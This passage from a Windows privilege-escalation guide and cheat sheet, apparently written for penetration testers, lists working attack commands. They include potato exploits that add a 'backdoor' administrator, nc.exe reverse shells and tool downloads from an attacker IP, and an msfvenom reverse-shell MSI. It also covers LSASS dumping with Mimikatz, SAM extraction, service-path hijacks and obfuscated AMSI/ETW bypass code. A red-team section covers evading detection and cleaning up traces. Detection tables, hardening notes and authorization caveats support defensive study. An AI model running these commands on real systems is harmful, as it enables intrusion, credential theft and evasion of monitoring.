all modern Windows versions 1770 1771 ```batch 1772 :: Basic SYSTEM shell 1773 GodPotato.exe -cmd "cmd /c whoami" 1774 1775 :: Add user 1776 GodPotato.exe -cmd "net user backdoor Password123! /add" 1777 GodPotato.exe -cmd "net localgroup administrators backdoor /add" 1778 1779 :: Reverse shell 1780 GodPotato.exe -cmd "c:\temp\nc.exe 10.10.14.5 443 -e cmd.exe" 1781 ``` 1782 1783 ### 6.2.5 RoguePotato 1784 1785 **Status**: ✅ Works on Windows Server 2019+ 1786 1787 **Requires**: Remote OXID resolver (attacker-controlled) 1788 1789 **Setup (Attacker Machine):** 1790 1791 ```bash 1792 # Start OXID resolver 1793 socat tcp-listen:135,reuseaddr,fork tcp:TARGET_IP:9999 1794 ``` 1795 1796 **Execution (Target):** 1797 1798 ```batch 1799 RoguePotato.exe -r ATTACKER_IP -e "cmd.exe /c whoami > c:\temp\result.txt" -l 9999 1800 ``` 1801 1802 ### 6.2.6 EfsPotato 1803 1804 **Status**: ✅ Works by abusing Encrypting File System (EFS) 1805 1806 ```batch 1807 EfsPotato.exe "whoami" 1808 EfsPotato.exe "net user backdoor Password123! /add" 1809 ``` 1810 1811 ### 6.2.7 LocalPotato (NTLM Local Relay) 1812 1813 **Status**: ✅ Unique approach using local NTLM relay 1814 1815 ```batch 1816 # Requires specific scenario - local SMB auth 1817 LocalPotato.exe -i c:\temp\payload.exe 1818 ``` 1819 1820 ### 6.2.8 SweetPotato (Combined Approach) 1821 1822 **Status**: ✅ Combines multiple potato techniques 1823 1824 ```batch 1825 SweetPotato.exe -p c:\windows\system32\cmd.exe -a "/c whoami > c:\temp\result.txt" 1826 ``` 1827 1828 ## 6.3 Practical Potato Attack Workflow 1829 1830 ### 6.3.1 MSSQL to SYSTEM Example 1831 1832 ```bash 1833 # Step 1: Connect to MSSQL 1834 impacket-mssqlclient sql_dev@10.129.43.30 -windows-auth 1835 1836 # Step 2: Enable xp_cmdshell 1837 SQL> enable_xp_cmdshell 1838 1839 # Step 3: Verify privileges 1840 SQL> xp_cmdshell whoami /priv 1841 1842 # Step 4: Upload tool 1843 SQL> xp_cmdshell certutil -urlcache -f http://10.10.14.5/GodPotato.exe c:\temp\GodPotato.exe 1844 1845 # Step 5: Execute 1846 SQL> xp_cmdshell c:\temp\GodPotato.exe -cmd "cmd /c net localgroup administrators sql_dev /add" 1847 ``` 1848 1849 ### 6.3.2 IIS Web Shell to SYSTEM 1850 1851 ```powershell 1852 # From web shell, check privileges 1853 whoami /priv 1854 1855 # If SeImpersonatePrivilege present, upload and execute 1856 Invoke-WebRequest -Uri "http://10.10.14.5/PrintSpoofer.exe" -OutFile "C:\Windows\Temp\ps.exe" 1857 C:\Windows\Temp\ps.exe -c "C:\Windows\Temp\nc.exe 10.10.14.5 443 -e cmd.exe" 1858 ``` 1859 1860 --- 1861 1862 # VII. Defense & OPSEC 1863 1864 ## 7.1 Blue Team Perspective: Detection Points 1865 1866 ### 7.1.1 Critical Event IDs 1867 1868 | Event ID | Log | Description | Detection Value | 1869 |----------|-----|-------------|-----------------| 1870 | 4688 | Security | Process creation | Command-line monitoring | 1871 | 4689 | Security | Process termination | Process lifecycle | 1872 | 4624 | Security | Successful logon | Authentication tracking | 1873 | 4625 | Security | Failed logon | Brute force detection | 1874 | 4672 | Security | Special privileges assigned | Privilege escalation indicator | 1875 | 4673 | Security | Privileged service called | Sensitive operation monitoring | 1876 | 4697 | Security | Service installed | Persistence detection | 1877 | 4698 | Security | Scheduled task created | Persistence detection | 1878 | 7045 | System | New service installed | Service creation | 1879 | 1102 | Security | Audit log cleared | Anti-forensics detection | 1880 1881 ### 7.1.2 Sysmon Events for Detection 1882 1883 | Sysmon Event | Description | PrivEsc Detection | 1884 |--------------|-------------|-------------------| 1885 | Event 1 | Process creation | Tool execution, suspicious commands | 1886 | Event 3 | Network connection | C2 communications, data exfil | 1887 | Event 6 | Driver loaded | Vulnerable driver loading | 1888 | Event 7 | Image loaded (DLL) | DLL hijacking detection | 1889 | Event 10 | Process access | LSASS access, injection | 1890 | Event 11 | File created | Tool drops, payload creation | 1891 | Event 12/13/14 | Registry events | Service modification, persistence | 1892 | Event 17/18 | Named pipe events | Pipe-based attacks | 1893 | Event 25 | Process tampering | AMSI/ETW bypass attempts | 1894 1895 ### 7.1.3 Common Detection Signatures 1896 1897 **Service Binary Path Modification:** 1898 ``` 1899 Event 4657 (Registry modification) on: 1900 HKLM\SYSTEM\CurrentControlSet\Services\*\ImagePath 1901 ``` 1902 1903 **Suspicious Process Relationships:** 1904 ``` 1905 cmd.exe → net.exe (adding users) 1906 services.exe → cmd.exe (service exploitation) 1907 w3wp.exe → cmd.exe/powershell.exe (web shell) 1908 sqlservr.exe → cmd.exe (xp_cmdshell) 1909 ``` 1910 1911 **LSASS Access:** 1912 ``` 1913 Sysmon Event 10 with TargetImage: lsass.exe 1914 Access mask: 0x1010 (PROCESS_VM_READ | PROCESS_QUERY_INFORMATION) 1915 ``` 1916 1917 ## 7.2 OPSEC Considerations for Red Team 1918 1919 ### 7.2.1 Tool OPSEC Ratings 1920 1921 | Tool | Detection Rate | OPSEC Recommendations | 1922 |------|----------------|----------------------| 1923 | WinPEAS | Very High | Never use on production | 1924 | Mimikatz | Very High | Use only if necessary, custom compile | 1925 | SharpUp | High | Obfuscate, rename | 1926 | Rubeus | High | Custom compile, obfuscate | 1927 | Manual commands | Low-Medium | Blend with legitimate admin activity | 1928 | Living off the Land | Low | Preferred approach | 1929 1930 ### 7.2.2 Evasion Techniques 1931 1932 **AMSI Bypass (2025 Working Methods):** 1933 1934 ```powershell 1935 # Memory patching (basic) 1936 $mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1) 1937 [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext','NonPublic,Static').SetValue($null,$mem) 1938 1939 # Reflection-based 1940 [Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true) 1941 ``` 1942 1943 **ETW Bypass:** 1944 1945 ```powershell 1946 # Patch ETW 1947 $logProvider = [Ref].Assembly.GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance') 1948 # Requires process handle manipulation 1949 ``` 1950 1951 **Parent PID Spoofing:** 1952 - Use tools that support PPID spoofing 1953 - Makes malicious processes appear to have legitimate parents 1954 1955 ### 7.2.3 Operational Recommendations 1956 1957 1. **Time your activities**: Execute during business hours to blend with legitimate activity 1958 2. **Use existing channels**: Leverage already-established connections 1959 3. **Minimal footprint**: Avoid writing to disk when possible 1960 4. **Clean up**: Remove tools and artifacts after use 1961 5. **Log awareness**: Know what you're triggering and document for reporting 1962 6. **Test detection**: Use isolated systems to verify tool detectability 1963 1964 --- 1965 1966 # VIII. The Ultimate Cheat Sheet 1967 1968 ## 8.1 Initial Enumeration Commands 1969 1970 ### System Information 1971 1972 ```batch 1973 :: Basic info 1974 systeminfo 1975 hostname 1976 whoami /all 1977 1978 :: Architecture 1979 echo %PROCESSOR_ARCHITECTURE% 1980 wmic os get osarchitecture 1981 1982 :: Patches 1983 wmic qfe list brief 1984 ``` 1985 1986 ```powershell 1987 Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion 1988 Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10 1989 ``` 1990 1991 ### User/Group Enumeration 1992 1993 ```batch 1994 :: Current user 1995 whoami /priv 1996 whoami /groups 1997 net user %USERNAME% 1998 1999 :: All users 2000 net user 2001 net localgroup 2002 net localgroup Administrators 2003 net accounts 2004 ``` 2005 2006 ```powershell 2007 Get-LocalUser | Select-Object Name, Enabled, Description 2008 Get-LocalGroupMember -Group "Administrators" 2009 ``` 2010 2011 ### Network Enumeration 2012 2013 ```batch 2014 ipconfig /all 2015 arp -a 2016 route print 2017 netstat -ano 2018 netstat -ano | findstr LISTENING 2019 ``` 2020 2021 ### Process/Service Enumeration 2022 2023 ```batch 2024 tasklist /svc 2025 sc query 2026 wmic service get name,pathname,startmode | findstr /i "auto" 2027 ``` 2028 2029 ## 8.2 Service Exploitation Commands 2030 2031 ### Unquoted Service Paths 2032 2033 ```batch 2034 :: Detection 2035 wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ 2036 2037 :: Exploitation (place binary in hijackable path) 2038 copy payload.exe "C:\Program Files\Vulnerable.exe" 2039 sc stop VulnerableService 2040 sc start VulnerableService 2041 ``` 2042 2043 ### Weak Service Permissions 2044 2045 ```batch 2046 :: Detection 2047 accesschk.exe /accepteula -uwcqv "Users" * 2048 accesschk.exe /accepteula -uwcqv "Authenticated Users" * 2049 2050 :: Exploitation 2051 sc config VulnerableService binpath= "cmd /c net localgroup administrators YOUR_USER /add" 2052 sc stop VulnerableService 2053 sc start VulnerableService 2054 ``` 2055 2056 ### Weak Binary Permissions 2057 2058 ```batch 2059 :: Detection 2060 icacls "C:\Path\To\service.exe" 2061 accesschk.exe /accepteula -quvw "C:\Path\To\service.exe" 2062 2063 :: Exploitation 2064 copy /Y payload.exe "C:\Path\To\service.exe" 2065 sc stop VulnerableService 2066 sc start VulnerableService 2067 ``` 2068 2069 ## 8.3 Registry Exploitation 2070 2071 ### AlwaysInstallElevated 2072 2073 ```batch 2074 :: Detection 2075 reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2076 reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 2077 2078 :: Exploitation 2079 msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi 2080 msiexec /quiet /qn /i evil.msi 2081 ``` 2082 2083 ## 8.4 Credential Harvesting 2084 2085 ### File Searches 2086 2087 ```batch 2088 :: Password in files 2089 findstr /si password *.txt *.xml *.ini *.config 2090 findstr /spin "password" *.* 2091 2092 :: Specific files 2093 dir /s /b unattend.xml sysprep.xml web.config 2094 where /R C:\ *.config 2095 ``` 2096 2097 ### Windows Credentials 2098 2099 ```batch 2100 :: Credential Manager 2101 cmdkey /list 2102 2103 :: WiFi 2104 netsh wlan show profiles 2105 netsh wlan show profile name="ProfileName" key=clear 2106 2107 :: Registry autologon 2108 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2109 ``` 2110 2111 ### PowerShell History 2112 2113 ```powershell 2114 Get-Content (Get-PSReadLineOption).HistorySavePath 2115 ``` 2116 2117 ### SAM/SYSTEM Extraction 2118 2119 ```batch 2120 :: If admin 2121 reg save HKLM\SAM C:\temp\SAM 2122 reg save HKLM\SYSTEM C:\temp\SYSTEM 2123 ``` 2124 2125 ## 8.5 Privilege Abuse 2126 2127 ### SeImpersonatePrivilege 2128 2129 ```batch 2130 :: PrintSpoofer 2131 PrintSpoofer.exe -i -c cmd 2132 PrintSpoofer.exe -c "nc.exe 10.10.14.5 443 -e cmd.exe" 2133 2134 :: GodPotato 2135 GodPotato.exe -cmd "cmd /c whoami" 2136 GodPotato.exe -cmd "net localgroup administrators YOUR_USER /add" 2137 ``` 2138 2139 ### SeBackupPrivilege 2140 2141 ```powershell 2142 Import-Module .\SeBackupPrivilegeUtils.dll 2143 Import-Module .\SeBackupPrivilegeCmdLets.dll 2144 Set-SeBackupPrivilege 2145 Copy-FileSeBackupPrivilege C:\Windows\NTDS\ntds.dit C:\temp\ntds.dit 2146 ``` 2147 2148 ### SeDebugPrivilege 2149 2150 ```batch 2151 :: LSASS dump 2152 procdump.exe -accepteula -ma lsass.exe lsass.dmp 2153 2154 :: Mimikatz 2155 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords" "exit" 2156 ``` 2157 2158 ### SeTakeOwnershipPrivilege 2159 2160 ```batch 2161 takeown /f "C:\Path\To\Protected\File" 2162 icacls "C:\Path\To\Protected\File" /grant YOUR_USER:F 2163 ``` 2164 2165 ## 8.6 Group Privilege Abuse 2166 2167 ### Backup Operators 2168 2169 ```powershell 2170 # Enable privilege 2171 Import-Module .\SeBackupPrivilegeUtils.dll 2172 Import-Module .\SeBackupPrivilegeCmdLets.dll 2173 Set-SeBackupPrivilege 2174 2175 # Copy protected files 2176 Copy-FileSeBackupPrivilege C:\Windows\System32\config\SAM C:\temp\SAM 2177 Copy-FileSeBackupPrivilege C:\Windows\System32\config\SYSTEM C:\temp\SYSTEM 2178 ``` 2179 2180 ### DnsAdmins 2181 2182 ```batch 2183 :: Generate DLL 2184 msfvenom -p windows/x64/exec cmd='net group "domain admins" YOUR_USER /add /domain' -f dll -o adduser.dll 2185 2186 :: Load DLL 2187 dnscmd.exe /config /serverlevelplugindll C:\Path\To\adduser.dll 2188 2189 :: Restart DNS 2190 sc stop dns 2191 sc start dns 2192 ``` 2193 2194 ### Server Operators 2195 2196 ```batch 2197 :: Modify service 2198 sc config AppReadiness binpath= "cmd /c net localgroup Administrators YOUR_USER /add" 2199 sc stop AppReadiness 2200 sc start AppReadiness 2201 ``` 2202 2203 ### Print Operators 2204 2205 ```batch 2206 :: Load vulnerable driver 2207 reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys" 2208 reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1 2209 EnableSeLoadDriverPrivilege.exe 2210 ExploitCapcom.exe 2211 ``` 2212 2213 ## 8.7 File Transfer Methods 2214 2215 ```batch 2216 :: Certutil 2217 certutil -urlcache -f http://10.10.14.5/file.exe C:\temp\file.exe 2218 2219 :: PowerShell 2220 powershell -c "(New-Object Net.WebClient).DownloadFile('http://10.10.14.5/file.exe','C:\temp\file.exe')" 2221 powershell -c "Invoke-WebRequest -Uri 'http://10.10.14.5/file.exe' -OutFile 'C:\temp\file.exe'" 2222 2223 :: Bitsadmin 2224 bitsadmin /transfer job /download /priority high http://10.10.14.5/file.exe C:\temp\file.exe 2225 2226 :: SMB (no HTTP needed) 2227 copy \\10.10.14.5\share\file.exe C:\temp\file.exe 2228 ``` 2229 2230 ## 8.8 Common SID Reference 2231 2232 | SID | Name | 2233 |-----|------| 2234 | S-1-5-18 | NT AUTHORITY\SYSTEM | 2235 | S-1-5-19 | NT AUTHORITY\LOCAL SERVICE | 2236 | S-1-5-20 | NT AUTHORITY\NETWORK SERVICE | 2237 | S-1-5-32-544 | BUILTIN\Administrators | 2238 | S-1-5-32-545 | BUILTIN\Users | 2239 | S-1-5-32-551 | BUILTIN\Backup Operators | 2240 | S-1-5-32-555 | BUILTIN\Remote Desktop Users | 2241 | S-1-1-0 | Everyone | 2242 | S-1-5-11 | Authenticated Users | 2243 2244 ## 8.9 CMD vs PowerShell Equivalents 2245 2246 | Task | CMD | PowerShell | 2247 |------|-----|------------| 2248 | Current user | `whoami` | `whoami` or `[Security.Principal.WindowsIdentity]::GetCurrent().Name` | 2249 | List files | `dir` | `Get-ChildItem` or `ls` | 2250 | File content | `type file.txt` | `Get-Content file.txt` or `cat file.txt` | 2251 | Search files | `dir /s /b *.txt` | `Get-ChildItem -Recurse -Include *.txt` | 2252 | Search content | `findstr /si password *.txt` | `Select-String -Path *.txt -Pattern password` | 2253 | Process list | `tasklist` | `Get-Process` | 2254 | Service list | `sc query` | `Get-Service` | 2255 | Network connections | `netstat -ano` | `Get-NetTCPConnection` | 2256 | Environment vars | `set` | `Get-ChildItem Env:` | 2257 | Registry query | `reg query HKLM\...` | `Get-ItemProperty "HKLM:\..."` | 2258 2259 --- 2260 2261 # IX. 2026 Addendum: Modern Attack Surface 2262 2263 This section adds newer and less common checks that are easy to miss in a traditional service-and-token workflow. Treat version-specific techniques as hypotheses until the exact product version, patch level, permissions, and execution context have been confirmed. Use destructive primitives only in an isolated lab or when the rules of engagement explicitly allow them. 2264 2265 ## 9.1 Logging and Telemetry Awareness 2266 2267 Before running broad enumeration, determine what PowerShell activity and Windows events are being retained or forwarded. These controls do not create an escalation path, but they materially change the detection footprint of one. 2268 2269 ### PowerShell transcription 2270 2271 ```batch 2272 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription 2273 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription 2274 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription /s 2275 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription /s 2276 ``` 2277 2278 The configured output directory is commonly stored in `OutputDirectory`. Transcripts may also be placed in a centrally managed share. 2279 2280 ### Module and script-block logging 2281 2282 ```batch 2283 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /s 2284 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging /s 2285 reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /s 2286 reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging /s 2287 ``` 2288 2289 ```powershell 2290 Get-WinEvent -LogName 'Windows PowerShell' -MaxEvents 15 2291 Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' -MaxEvents 20 2292 ``` 2293 2294 Also check audit policy and Windows Event Forwarding: 2295 2296 ```batch 2297 auditpol /get /category:* 2298 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit 2299 reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager 2300 ``` 2301 2302 ## 9.2 Update Infrastructure and Privileged Agent IPC 2303 2304 ### WSUS transport and proxy configuration 2305 2306 Check whether the host is directed to an internal WSUS server and whether the policy actually enables it: 2307 2308 ```batch 2309 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer 2310 reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer 2311 ``` 2312 2313 ```powershell 2314 Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' -Name WUServer 2315 Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name UseWUServer 2316 ``` 2317 2318 An HTTP `WUServer` value is a warning sign, not proof of exploitability. Confirm that `UseWUServer` is `1`, identify the Windows build and WSUS client behavior, and test only in an authorized environment. CVE-2020-1013 is a separate client-side local escalation condition involving user-controlled proxy and certificate trust; do not assume every HTTP WSUS deployment is vulnerable to it. 2319 2320 Review user and machine proxy settings as part of the same check: 2321 2322 ```batch 2323 reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 2324 reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 2325 netsh winhttp show proxy 2326 ``` 2327 2328 ### Third-party updater and localhost IPC checklist 2329 2330 Enterprise agents frequently combine a privileged service, a localhost RPC/HTTP/named-pipe endpoint, and a SYSTEM update channel. For each agent: 2331 2332 1. Record its product and file version. 2333 2. Enumerate loopback listeners and named pipes. 2334 3. Inspect enrollment, proxy, update URL, and trust-store configuration. 2335 4. Determine whether a standard user can redirect enrollment or update traffic. 2336 5. Verify MSI/package signature and certificate-chain validation. 2337 6. Check whether the privileged service accepts user-controlled paths or commands. 2338 2339 ```powershell 2340 Get-NetTCPConnection -State Listen | 2341 Where-Object { $_.LocalAddress -in '127.0.0.1','::1' } | 2342 Sort-Object LocalPort 2343 2344 Get-ChildItem \\.\pipe\ 2345 ``` 2346 2347 The Netskope `stAgentSvc` chain tracked as CVE-2025-0309 is a useful case study: a localhost management surface and weak update trust can turn a low-privileged foothold into SYSTEM execution. Match the installed product and version to a vendor advisory before attempting validation. 2348 2349 ### Veeam Backup & Replication CVE-2023-27532 2350 2351 Vulnerable Veeam Backup & Replication builds before `11.0.1.1261` may expose a privileged service on TCP 9401. Confirm both the listener and the installed file version: 2352 2353 ```batch 2354 netstat -ano | findstr ":9401" 2355 ``` 2356 2357 ```powershell 2358 (Get-Item 'C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Shell.exe').VersionInfo.FileVersion 2359 ``` 2360 2361 Do not infer vulnerability from an open port alone. Validate the edition, build, service owner, and vendor patch status. 2362 2363 ## 9.3 Service Triggers and Indirect Starts 2364 2365 A user may be unable to call `StartService` but still be able to activate a privileged service by satisfying one of its triggers, such as network availability, device arrival, an ETW event, a named pipe/RPC endpoint, domain join, or Group Policy refresh. 2366 2367 ```batch 2368 sc qtriggerinfo <service-name> 2369 sc qc <service-name> 2370 sc qfailure <service-name> 2371 ``` 2372 2373 When a service binary, DLL, or configuration is writable but the service ACL denies `SERVICE_START`, check: 2374 2375 - whether it starts automatically at boot; 2376 - configured failure actions; 2377 - trigger-start conditions; 2378 - dependent services; 2379 - application actions that activate its COM, RPC, or named-pipe endpoint. 2380 2381 This matters for weak-binary and weak-registry findings: lack of direct restart rights lowers reliability, but it does not necessarily remove the escalation path. 2382 2383 ## 9.4 Secure Desktop ATConfig Registry Write (RegPwn) 2384 2385 CVE-2026-24291, commonly called RegPwn, abused accessibility configuration propagation during a secure-desktop transition. A user-controlled `HKCU` ATConfig value was copied by a SYSTEM process into a per-session `HKLM` key. By racing that copy and replacing the destination key with a registry symbolic link, an attacker could redirect the privileged write to another `HKLM` value. 2386 2387 Relevant locations: 2388 2389 ```text 2390 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs 2391 HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig\<feature> 2392 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\Session<id>\ATConfig\<feature> 2393 ``` 2394 2395 The public technique used an oplock on: 2396 2397 ```text 2398 C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu.xml 2399 ``` 2400 2401 The resulting primitive could redirect a SYSTEM registry value write toward a service `ImagePath` or `ServiceDll`. Microsoft patched the issue in March 2026; test patch state before treating it as a candidate. Locking the workstation is part of the public trigger and is operationally conspicuous. 2402 2403 ## 9.5 Process, GUI, and Memory Checks 2404 2405 ### Writable process images and search paths 2406 2407 Enumerate non-Microsoft process paths, owners, command lines, and directory ACLs. A writable executable is a direct replacement candidate; a writable parent directory may support DLL or module search-order hijacking. 2408 2409 ```powershell 2410 Get-CimInstance Win32_Process | ForEach-Object { 2411 $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue 2412 [pscustomobject]@{ 2413 Name = $_.Name 2414 PID = $_.ProcessId 2415 Owner = "$($owner.Domain)\$($owner.User)" 2416 Path = $_.ExecutablePath 2417 CommandLine = $_.CommandLine 2418 } 2419 } | Format-Table -AutoSize 2420 ``` 2421 2422 Pay special attention to elevated Electron, CEF, Chromium, updater, tray, and service-wrapper processes. Debug ports, remote-debugging flags, extension paths, writable resources, and missing modules can create application-specific escalation paths. 2423 2424 ### Insecure privileged GUI applications 2425 2426 A GUI process running as SYSTEM or high integrity may expose file-open/save dialogs, help links, browsers, or child-process launch actions. Confirm the process integrity level and whether a reachable UI action can start an arbitrary executable. Modern systems close many historical chains, so reproduce the exact application flow rather than relying on legacy examples. 2427 2428 ### Process memory and command-line secrets 2429 2430 Look for credentials passed on command lines before considering memory dumps: 2431 2432 ```powershell 2433 Get-CimInstance Win32_Process | Select-Object ProcessId,Name,CommandLine 2434 ``` 2435 2436 An authorized administrator can capture a process with Sysinternals ProcDump for offline review: 2437 2438 ```batch 2439 procdump.exe -accepteula -ma <process-name-or-pid> process.dmp 2440 ``` 2441 2442 Memory dumps can contain credentials, tokens, personal data, and encryption keys. Store and dispose of them as sensitive evidence. 2443 2444 ## 9.6 Node.js and Electron Root-Module Hijacking 2445 2446 Node resolves a bare import such as `require('foo')` by walking parent directories for `node_modules`. On Windows, an application below `C:\` can ultimately probe `C:\node_modules`. If a low-privileged user can create that directory and a privileged Node/Electron application requests a missing package, attacker-controlled JavaScript may execute in the application's context. 2447 2448 Example resolution path: 2449 2450 ```text 2451 C:\Users\Administrator\project\node_modules\foo 2452 C:\Users\Administrator\node_modules\foo 2453 C:\Users\node_modules\foo 2454 C:\node_modules\foo 2455 ``` 2456 2457 Hunt with Procmon using these filters: 2458 2459 - process name is the target Node/Electron executable; 2460 - path contains `node_modules`; 2461 - result is `NAME NOT FOUND`; 2462 - a later lookup reaches `C:\node_modules`. 2463 2464 Review unpacked application sources and ASAR content for bare imports, optional dependencies, and swallowed import failures: 2465 2466 ```bash 2467 rg -n 'require\("[^./]' . 2468 rg -n "require\('[^./]" . 2469 rg -n 'optionalDependencies' . 2470 ``` 2471 2472 Safe validation is to export a distinctive marker from a harmless test module and verify that the target loads it. Do not launch a payload until the target's integrity level and authorization scope are established. 2473 2474 Hardening: 2475 2476 - deny standard-user creation or modification of `C:\node_modules`; 2477 - package every runtime dependency, including optional modules that are probed at startup; 2478 - alert on high-integrity processes loading JavaScript from drive-root module folders; 2479 - remove silent `try { require(...) } catch {}` probes where possible. 2480 2481 ## 9.7 Driver Attack Surface 2482 2483 ### Missing `FILE_DEVICE_SECURE_OPEN` 2484 2485 For a named device object, a restrictive DACL may protect `\\.\DeviceName` while a relative/trailing-name open such as `\\.\DeviceName\anything` bypasses that device ACL if the driver does not set `FILE_DEVICE_SECURE_OPEN` or enforce equivalent checks in `IRP_MJ_CREATE`. 2486 2487 Audit workflow: 2488 2489 1. Enumerate third-party drivers and their device names. 2490 2. Compare direct opens with trailing-component opens as a standard user. 2491 3. Enumerate accepted IOCTLs and required access bits. 2492 4. Inspect whether privileged operations independently validate the caller. 2493 5. Match driver versions and hashes against vendor advisories and Microsoft's vulnerable-driver blocklist. 2494 2495 Once opened, dangerous IOCTLs may expose process handles, arbitrary termination, raw disk I/O, or kernel read/write. Opening the device is only the access-control finding; exploitability depends on the reachable IOCTL implementation. 2496 2497 Driver developers should set `FILE_DEVICE_SECURE_OPEN`, reject unexpected trailing names, use restrictive IOCTL access masks, validate the requestor mode and caller identity, and avoid returning privileged handles to untrusted callers. 2498 2499 ### Registry query type confusion 2500 2501 During driver review, flag `RtlQueryRegistryValues` calls that combine: 2502 2503 - `RTL_REGISTRY_ABSOLUTE` with a user-influenced path; 2504 - `RTL_QUERY_REGISTRY_DIRECT` without `RTL_QUERY_REGISTRY_TYPECHECK`; 2505 - a small scalar `EntryContext` reused across reads of different registry types; 2506 - a first read whose attacker-controlled value determines the size or destination of a second read. 2507 2508 `REG_QWORD`, string, and binary values have different direct-mode expectations. Treat heterogeneous reads into the same stack variable as a strong memory-corruption lead. Windows 8 and later add checks for untrusted hives, so assess writable keys in trusted system hives and reproduce on the exact build. 2509 2510 ### Race-condition and I/O ring research notes 2511 2512 For authorized kernel research, investigate these patterns: 2513 2514 - a request completed or freed while a cancel-safe queue lock is still held; 2515 - a cancel path that resumes with a stale request pointer; 2516 - a buffer pointer captured under a lock but copied to user mode after the lock is released; 2517 - attacker-controlled, variable-size paged-pool pointer arrays; 2518 - predictable writes that can corrupt a sprayed object's size field and create an out-of-bounds read. 2519 2520 Useful debugger indicators include `NtCancelIoFileEx -> IopCsqCancelRoutine`, a success path shaped like `Acquire -> Complete/free -> Release`, and `RtlCopyToUser` after lock release. These are research heuristics, not evidence that a particular driver is exploitable. 2521 2522 ## 9.8 Expanded Credential and Secret Locations 2523 2524 ### UWP PasswordVault / Credential Locker 2525 2526 The current interactive user may be able to decrypt credentials stored for that same session without administrator rights: 2527 2528 ```powershell 2529 [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] 2530 $vault = New-Object Windows.Security.Credentials.PasswordVault 2531 $vault.RetrieveAll() | ForEach-Object { 2532 try { 2533 $_.RetrievePassword() 2534 $_ 2535 } catch {} 2536 } | Select-Object Resource,UserName,Password 2537 ``` 2538 2539 Access is session- and user-scoped. Treat returned values as sensitive evidence and avoid printing them into persistent logs unnecessarily. 2540 2541 ### DPAPI and PowerShell credentials 2542 2543 ```powershell 2544 Get-ChildItem -Force "$env:APPDATA\Microsoft\Protect" 2545 Get-ChildItem -Force "$env:LOCALAPPDATA\Microsoft\Protect" 2546 Get-ChildItem -Force "$env:APPDATA\Microsoft\Credentials" 2547 Get-ChildItem -Force "$env:LOCALAPPDATA\Microsoft\Credentials" 2548 2549 $credential = Import-Clixml -Path 'C:\path\credential.xml' 2550 $credential.GetNetworkCredential() | Format-List UserName,Domain,Password 2551 ``` 2552 2553 An exported PowerShell credential normally decrypts only for the same user on the same computer unless it was protected with an explicit key. DPAPI master-key recovery should be documented separately from decryption of individual credential blobs. 2554 2555 ### Additional high-value stores 2556 2557 ```text 2558 %LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings 2559 %LOCALAPPDATA%\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite 2560 %APPDATA%\gcloud\credentials.db 2561 %APPDATA%\gcloud\legacy_credentials\ 2562 %APPDATA%\gcloud\access_tokens.db 2563 %USERPROFILE%\.aws\credentials 2564 %USERPROFILE%\.azure\accessTokens.json 2565 %USERPROFILE%\.azure\azureProfile.json 2566 ``` 2567 2568 Check saved RDP and PuTTY metadata: 2569 2570 ```batch 2571 reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers" /s 2572 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s 2573 reg query "HKCU\Software\SimonTatham\PuTTY\SshHostKeys" /s 2574 reg query "HKCU\Software\OpenSSH\Agent\Keys" /s 2575 ``` 2576 2577 OpenSSH agent implementations have changed over time; the absence of `HKCU\Software\OpenSSH\Agent\Keys` is normal on many current builds. 